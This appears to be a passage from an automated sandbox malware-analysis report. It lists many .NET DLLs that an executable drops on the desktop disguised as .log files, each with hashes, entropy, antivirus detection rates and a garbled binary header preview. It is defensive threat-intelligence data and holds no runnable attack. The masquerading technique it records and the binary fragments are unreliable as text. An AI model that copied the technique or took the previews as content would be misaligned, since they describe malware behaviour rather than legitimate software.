                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\INSOfWoM.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):294912
                                                            Entropy (8bit):6.010605469502259
                                                            Encrypted:false
                                                            SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                            MD5:00574FB20124EAFD40DC945EC86CA59C
                                                            SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                            SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                            SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                            C:\Users\user\Desktop\ItSOHkQo.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):342528
                                                            Entropy (8bit):6.170134230759619
                                                            Encrypted:false
                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\JBWWRkkK.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\JtmEmBJF.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\NjdutxKy.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):41472
                                                            Entropy (8bit):5.6808219961645605
                                                            Encrypted:false
                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\NpUfPQGh.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\NsNNYhlE.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                            C:\Users\user\Desktop\OmvnkQVc.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\SLfLdrcT.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):40448
                                                            Entropy (8bit):5.7028690200758465
                                                            Encrypted:false
                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\UhRuWMEn.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33280
                                                            Entropy (8bit):5.634433516692816
                                                            Encrypted:false
                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\WagdIJql.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):40448
                                                            Entropy (8bit):5.7028690200758465
                                                            Encrypted:false
                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\XXHldJFg.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\YDIlGXhH.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\ZAjtbXwC.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\aInBkXPZ.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\aauTzsJb.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\ctybNUhB.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                            C:\Users\user\Desktop\fBwkimbw.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\ftMSEDAr.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\gJztsmvT.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
